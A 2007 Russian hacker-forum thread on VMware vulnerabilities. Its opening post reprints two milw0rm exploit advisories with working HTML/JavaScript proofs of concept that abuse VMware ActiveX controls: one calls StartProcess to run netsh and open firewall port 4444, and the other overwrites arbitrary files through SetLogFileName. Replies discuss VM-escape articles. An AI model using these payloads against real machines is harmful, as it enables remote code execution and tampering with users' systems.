ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Мировые новости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в VmWare
  #1  
Старый 24.09.2007, 00:19
Liar
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773

Репутация: 632
По умолчанию Уязвимости в VmWare

Виртуальные машины используются в качустве полигона для для иследования вредоносных программ, создания гостевой оси для хак опытов каждый для себя найдёт сам применения . Но так же как и другое ПО они не лешены ошибок в коде и поэтому и поэтому представляют собой соблазнительную идею для атак.
29 июля 2007 года хакер caLLAX из групы GOODFELLAS Security Research Team нашёл уязвимость в VmWare , он обнаружил что в состав VmWare входит любопытный ActiveX компонент, он реализован вдинамической библиотеке vielib.dll которая экспортирует потециально небезопасные методы.ОДним из таких методов является StartProcess позволяющий порождать процесы от имени текущего пользователя со всеми его привелегиями.
подробнее можно прочитать на :
http://www.securityfocus.com/bid/25118
сам эксплоит:
Код:
:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit
=============================================================================

Internal ID: VULWAR200707290.
-----------

Introduction
------------
vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The StartProcess method doesn't check if it's being called from the application,
or malicious users. Remote Attacker could craft a html page and execute code in
a remote system with the actual user privileges.


Impact
------
Any computer that uses this Sofware will be exposed to Remote Execution Code.


Workaround
----------
- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529
- Unregister vielib.dll using regsvr32.


Timeline
--------
July 29 2007 -- Bug Discovery.
July 29 2007 -- Exploit published.


Credits
-------
 * callAX <callAX@shellcode.com.ar>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
 

Technical Details
-----------------

StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit
is using three standard files that exists in every Microsoft Office 2003 Application.


<HTML>
<BODY>
  <object id=ctrl classid="clsid:{7B9C5422-39AA-4C21-BEEF-645E42EB4529}"></object>
<SCRIPT>

function Poc() {
 arg1 = "C:\\windows\\system32\\netsh.exe"
 arg2 = "C:\\windows\\system32\\netsh.exe firewall add portopening tcp 4444 GotIT"
 arg3 = "C:\\windows\\system32\\"
 arg4 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseneu.txt"
 arg5 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseeng.txt"
 arg6 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseenu.txt"
 arg7 = "1"
 ctrl.StartProcess(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7)
 }

</SCRIPT>
<input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-29]
http://milw0rm.com/exploits/4244
так же 30июля 2007 года (на следующий день)
этим же самым человеком была найдена ещё одна уязвимость в этой же библиотеке.
Так же 28 июля той же групой была найдена уязвимость в VmWare позволяющая произвести перезапись произвольного кода
Код:
<!--
---------------------------------------------------------------------------

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

IntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit
===========================================================================

Internal ID: VULWAR200707280.
-----------

Introduction
------------
IntraProcessLogging.dll is a library included in the Program Vmware from
Vmware Inc. Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The SetLogFileName method doesn't check if it's being called from the
application,
or malicious users. Remote Attacker could craft a html page and overwrite
arbitrary
files in a system.


Impact
------
Any computer that uses this Sofware will be exposed to Data Write Arbitrary.


Workaround
----------
- Activate the Kill bit zero in clsid:AF13B07E-28A1-4CAC-9C9A-EC582E354A24
- Unregister IntraProcessLogging.dll using regsvr32.


Timeline
--------
July 28 2007 -- Bug Discovery.
July 28 2007 -- Exploit published.


Credits
-------
 * callAX <callAX@shellcode.com.ar>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>


Technical Details
-----------------

SetLogFileName method receives one argument filename in this format
"c:\path\file".


Proof of Concept
---------------->

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>

<SCRIPT>

function Do_it()
 {
   File = "c:\\arbitrary_file.txt"
   ctrl.SetLogFileName(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-28]
http://milw0rm.com/exploits/4240

и так в связи популяризации виртуальных машин начинаются оттачиваться новые технологии нападения и обороны на онные.

навеяно журналом хакер за сентябрь (постараясь зделать скан статей с описанием данной уязвимости)
Так же при поиске на http://milw0rm.com/search.php уязвимостей по запросу VmWare было показанно 5 уязвимостей что уже заставляет задуматься.

2007-07-30 VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit 6925 R D X callAX

2007-07-29 VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit 5887 R D X callAX
2007-07-28 VMware IntraProcessLogging.dll 5.5.3.42958 Arbitrary Data Write Exploit 3726 R D X callAX
2006-08-27 VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit 5491 R D c0ntex
2006-08-16 VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit 3663 R D X nop
 
Ответить с цитированием

  #2  
Старый 24.09.2007, 01:00
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

Так уязвимость вроде как выполняется внутри vmware на которую поставлена винда, а не в самой реальной системе?..
И как тут же написано "создания гостевой оси для хак опытов". У меня на vmware рассадник троянов и вирусов, да и друзья заходят через radmin поприкалыватся. Так-что каких-то там уязвимостей внутри vmware бояться... Это странно
Если конечно vmware не использовать для vps.
 
Ответить с цитированием

Ошибка имевшая место в 2005 году
  #3  
Старый 24.09.2007, 19:01
Liar
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773

Репутация: 632
По умолчанию Ошибка имевшая место в 2005 году

А вот здесь ты не прав так как уязвимость в vmnat.ехе входящей в состав VMWare Workstation 5.5.0 приводила к тому что при вызывания переполнения динамической памяти возможна была засылка кода на основную ось со всеми вытикающими из этого последствиями.
более подробно можно почитать в архиве с сканом журнала
http://slil.ru/24894467
 
Ответить с цитированием

  #4  
Старый 24.09.2007, 19:36
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

В Хакере каком-то писали, что есть там уязвимость какая-то, использование, которой, позволяет "выйти за границы вээмваре"(номера 55-70 примерно)
 
Ответить с цитированием

  #5  
Старый 24.09.2007, 19:38
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dr.Check  
В Хакере каком-то писали, что есть там уязвимость какая-то, использование, которой, позволяет "выйти за границы вээмваре"(номера 55-70 примерно)
статья Криса?
 
Ответить с цитированием

  #6  
Старый 24.09.2007, 19:51
Liar
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773

Репутация: 632
По умолчанию

Статья называется побег из VMWare (Помоему так)
п\с: http://www.xakep.ru/magazine/xa/087/072/1.asp

Последний раз редактировалось Liar; 24.09.2007 в 19:55..
 
Ответить с цитированием

  #7  
Старый 24.09.2007, 19:58
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Да Крис писал, 87 номер. Старая статья уже.
 
Ответить с цитированием

  #8  
Старый 24.09.2007, 20:00
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Fata1ex  
Да Крис писал, 87 номер. Старая статья уже.
старая, но интересная)
 
Ответить с цитированием

  #9  
Старый 24.09.2007, 20:02
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

В тот период было гораздо больше интересных статей чем сейчас=(
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
проблема с установкой VMWare Piflit Windows 9 27.06.2007 16:21
Вышла бета-версия VMware Fusion для Mac »Atom1c« Мировые новости 0 28.12.2006 20:44
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ